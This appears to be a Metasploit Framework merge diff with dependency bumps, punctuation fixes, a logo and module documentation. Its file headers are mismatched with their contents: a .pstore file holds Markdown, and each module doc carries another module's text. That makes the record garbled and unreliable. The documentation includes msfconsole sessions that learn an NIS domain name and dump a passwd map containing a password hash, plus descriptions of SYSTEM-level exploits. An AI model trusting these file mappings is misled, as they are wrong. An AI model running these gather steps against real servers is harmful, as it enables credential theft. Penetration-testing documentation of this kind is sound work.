Merged master for module cache changes

Author: clee-r7

.gitignore

@@ -93,3 +93,7 @@ docker-compose.local*
 # Ignore python bytecode
 *.pyc
 rspec.failures
+
+
+#Ignore any base disk store files
+db/modules_metadata_base.pstore

CONTRIBUTING.md

@@ -45,8 +45,8 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
+* **Do** [reference associated issues] in your pull request description.
+* **Do** write [release notes] once a pull request is landed.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 
@@ -58,8 +58,8 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
   - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
 * **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
-* **Do** include instructions on how to setup the vulnerable environment or software
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
+* **Do** include instructions on how to setup the vulnerable environment or software.
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
 
 
 

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.32)
+    metasploit-framework (5.0.0)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -18,7 +18,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.23)
+      metasploit-payloads (= 1.3.25)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.3.3)
       mqtt
@@ -183,14 +183,14 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.23)
-    metasploit_data_models (2.0.15)
+    metasploit-payloads (1.3.25)
+    metasploit_data_models (2.0.16)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
       metasploit-concern
       metasploit-model
-      pg
+      pg (= 0.20.0)
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
@@ -205,7 +205,7 @@ GEM
     nessus_rest (0.1.6)
     net-ssh (4.2.0)
     network_interface (0.0.2)
-    nexpose (7.1.1)
+    nexpose (7.2.0)
     nokogiri (1.8.1)
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)

data/logos/under-construction-v5.txt

@@ -0,0 +1,25 @@
+%clr%red               .;lxO0KXXXK0Oxl:.
+           ,o0WMMMMMMMMMMMMMMMMMMKd,
+        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
+      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
+    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
+   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
+  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
+ oMMMMMMMMMMx.                    dMMMMMMMMMMx
+.WMMMMMMMMM:                       :MMMMMMMMMM,
+xMMMMMMMMMo                         lMMMMMMMMMO
+NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
+MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
+NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
+xMMMMMMMMMd                        ,0MMMMMMMMMMK;
+.WMMMMMMMMMc                         'OMMMMMM0,
+ lMMMMMMMMMMk.                         .kMMO'
+  dMMMMMMMMMMWd'                         ..
+   cWMMMMMMMMMMMNxc'.%clr%whi                ##########%clr
+%red    .0MMMMMMMMMMMMMMMMWc%clr%whi            #+#    #+#%clr
+%red      ;0MMMMMMMMMMMMMMMo.%clr%whi          +:+%clr
+%red        .dNMMMMMMMMMMMMo%clr          +%whi#+%clr+:++#+
+%red           'oOWMMMMMMMMo%clr                +:+
+%red               .,cdkO0K;%clr        :+:    :+:                                
+                                :::::::+:
+           %whiMetasploit%clr %yelUnder Construction%clr

db/modules_metadata_base.pstore

@@ -0,0 +1,110 @@
+## Intro
+
+From the `bootparamd(8)` man page:
+
+> bootparamd is a server process that provides information to diskless clients necessary for booting. It consults the /etc/bootparams file to find the information it needs.
+
+The module documented within will allow a tester to disclose the NIS
+domain name from a server running `bootparamd`. After knowing the domain
+name, the tester can follow up with `auxiliary/gather/nis_ypserv_map` to
+dump a map from a compatible NIS server (running as `ypserv`).
+
+## Setup
+
+Set up NIS as per <https://help.ubuntu.com/community/SettingUpNISHowTo>.
+If the link is down, you can find it via the Wayback Machine.
+
+After that is done, install `bootparamd` however your OS provides it.
+
+Make sure you add a client to the `bootparams` file, which is usually at
+`/etc/bootparams`.
+
+Here is an example `bootparams` file (courtesy of
+[@bcoles](https://github.com/bcoles)):
+
+```
+clientname root=nfsserver:/export/clientname/root
+```
+
+You can read the `bootparams(5)` man page for more info.
+
+Lastly, the client should be added to `/etc/hosts` if it isn't already
+resolvable.
+
+## Options
+
+**PROTOCOL**
+
+Set this to either TCP or UDP. UDP is the default due to `bootparamd`.
+
+**CLIENT**
+
+Set this to the address of a client in the target's `bootparams` file.
+Usually this is a host within the same network range as the target.
+
+**XDRTimeout**
+
+Set this to the timeout in seconds for XDR decoding of the response.
+
+## Usage
+
+```
+msf > use auxiliary/gather/nis_bootparamd_domain
+msf auxiliary(gather/nis_bootparamd_domain) > set rhost 192.168.33.10
+rhost => 192.168.33.10
+msf auxiliary(gather/nis_bootparamd_domain) > set client 192.168.33.10
+client => 192.168.33.10
+msf auxiliary(gather/nis_bootparamd_domain) > run
+
+[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft
+[*] Auxiliary module execution completed
+msf auxiliary(gather/nis_bootparamd_domain) >
+```
+
+After disclosing the domain name, you can use
+`auxiliary/gather/nis_ypserv_map` to dump a map from a compatible NIS
+server.
+
+```
+msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map
+msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.33.10
+rhost => 192.168.33.10
+msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
+domain => gesellschaft
+msf auxiliary(gather/nis_ypserv_map) > run
+
+[+] 192.168.33.10:111 - Dumping map passwd.byname on domain gesellschaft:
+list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+games:*:5:60:games:/usr/games:/usr/sbin/nologin
+news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+sys:*:3:3:sys:/dev:/usr/sbin/nologin
+backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
+uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
+bin:*:2:2:bin:/bin:/usr/sbin/nologin
+gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+sync:*:4:65534:sync:/bin:/bin/sync
+systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+uuidd:*:108:112::/run/uuidd:/bin/false
+dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+root:*:0:0:root:/root:/bin/bash
+sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
+systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+messagebus:*:107:111::/var/run/dbus:/bin/false
+_apt:*:105:65534::/nonexistent:/bin/false
+mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
+syslog:*:104:108::/home/syslog:/bin/false
+daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+pollinate:*:111:1::/var/cache/pollinate:/bin/false
+www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
+proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
+lxd:*:106:65534::/var/lib/lxd/:/bin/false
+
+[*] Auxiliary module execution completed
+msf auxiliary(gather/nis_ypserv_map) >
+```

documentation/modules/auxiliary/gather/nis_bootparamd_domain.md

@@ -1,8 +1,17 @@
 ## Vulnerable Application
 
-[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
+[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28, v10.0.28, and v10.1.16
+are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker
+to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities
+are caused by improper bounds checking of the request path in HTTP GET requests and username value
+via HTTP POST requests sent to the built-in web server, respectively.
+
+This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available
+for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe)
+and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
 
 ## Verification Steps
+
   1. Install a vulnerable Sync Breeze Enterprise
   2. Start `Sync Breeze Enterprise` service
   3. Start `Sync Breeze Enterprise` client application

documentation/modules/exploit/windows/http/syncbreeze_bof.md

@@ -1,7 +1,7 @@
 ms08_067_netapi is one of the most popular remote exploits against Microsoft Windows. It is
-considered a reliable exploit, and allows you to gain access as SYSTEM - the highest Windows
-privilege. In modern day penetration test, this exploit would most likely be used in an internal
-environment, and not so much from external due to the likelihood of a firewall.
+considered a reliable exploit and allows you to gain access as SYSTEM - the highest Windows
+privilege. In modern day penetration tests, this exploit would most likely be used in an internal
+environment and not so much from external due to the likelihood of a firewall.
 
 The check command of ms08_067_netapi is also highly accurate, because it is actually testing the
 vulnerable code path, not just passively.
@@ -15,7 +15,7 @@ This exploit works against a vulnerable SMB service from one of these Windows sy
 * Windows XP
 * Windows 2003
 
-To reliability determine whether the machine is vulnerable, you will have to either examine
+To reliably determine whether the machine is vulnerable, you will have to either examine
 the system's patch level, or use a vulnerability check.
 
 ## Verification Steps

documentation/modules/exploit/windows/smb/ms08_067_netapi.md

@@ -1,7 +1,7 @@
 ms17_010_eternalblue is a remote exploit against Microsoft Windows, originally written by the
 Equation Group (NSA) and leaked by Shadow Brokers (an unknown hacking entity). It is
-considered a reliable exploit, and allows you to gain access not only as SYSTEM - the highest Windows
-user mode privilege, but also full control of the kernel in ring 0. In modern day penetration test,
+considered a reliable exploit and allows you to gain access not only as SYSTEM - the highest Windows
+user mode privilege, but also full control of the kernel in ring 0. In modern day penetration tests,
 this exploit can be found in internal and external environments.
 
 As far as remote kernel exploits go, this one is highly reliable and safe to use.

documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md

@@ -22,6 +22,7 @@ module Metasploit::Framework::Spec::Constants
     Error
     External
     Loader
+    Metadata
     MetasploitClassCompatibilityError
     Namespace
     VersionCompatibilityError